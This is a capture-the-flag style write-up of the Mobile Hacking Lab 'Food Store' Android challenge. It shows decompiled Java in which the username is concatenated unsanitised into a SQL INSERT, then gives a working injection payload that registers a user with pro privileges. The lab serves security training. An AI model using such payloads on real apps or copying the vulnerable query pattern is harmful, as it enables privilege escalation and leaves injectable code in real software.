Food Store (Mobile Hacking Lab)
This writeup details the solution to the Food Store challenge available here:
https://www.mobilehackinglab.com
The lab requires static analysis of the APK file to identify a SQL injection vulnerability in the user registration process which allows for sign up at a higher privilege level.
App Exploration
Initially running the app brings us to a log in screen but we can also sign up:
The advisory details that we will have regular status on sign up, our goal is to become a pro user.
Let's sign up with some basic details:
Once logged in we can see some menu items.
Note that I should be able to see my user level across the app banner, it isn't working for me here.
APK Analysis
Let's look at the APK with jadx-gui.
In the Signup class, we can see the code that gets the user input which then calls dbHelper.addUser(newUser):
// [...SNIP...]
User newUser = new User(0, obj, obj2, editText2.getText().toString(), false, 1, null);
dbHelper.addUser(newUser);
Toast.makeText(this$0, "User Registered Successfully", 0).show();
return;
Let's look at the DBHelper class and the addUser method:
public final void addUser(User user) {
Intrinsics.checkNotNullParameter(user, "user");
SQLiteDatabase db = getWritableDatabase();
byte[] bytes = user.getPassword().getBytes(Charsets.UTF_8);
Intrinsics.checkNotNullExpressionValue(bytes, "this as java.lang.String).getBytes(charset)");
String encodedPassword = Base64.encodeToString(bytes, 0);
String Username = user.getUsername();
byte[] bytes2 = user.getAddress().getBytes(Charsets.UTF_8);
Intrinsics.checkNotNullExpressionValue(bytes2, "this as java.lang.String).getBytes(charset)");
String encodedAddress = Base64.encodeToString(bytes2, 0);
String sql = "INSERT INTO users (username, password, address, isPro) VALUES ('" + Username + "', '" + encodedPassword + "', '" + encodedAddress + "', 0)";
db.execSQL(sql);
db.close();
}
We can see that the password and address values are base64 encoded but the username input is put into the SQL statement unsanitised. Additionally, we can see that the boolean isPro is part of the SQL Insert statement.
Exploitation
To exploit this, we need to inject a valid SQL statement into the username field, such as:
strayvoltage','dGVzdA==','dGVzdA==',1);//
When selecting sign up we get the User registered successfully toast. Logging in with strayvoltage:test gets us a successful login:
Unfortunately I cannot see that banner mentioned earlier which would show that we are a pro user. To get around this we can go to /data/data/com.mobilehackinglab.foodstore/databases and download userdatabase.db. Viewing the users table shows that the strayvoltage user has isPro set to 1.
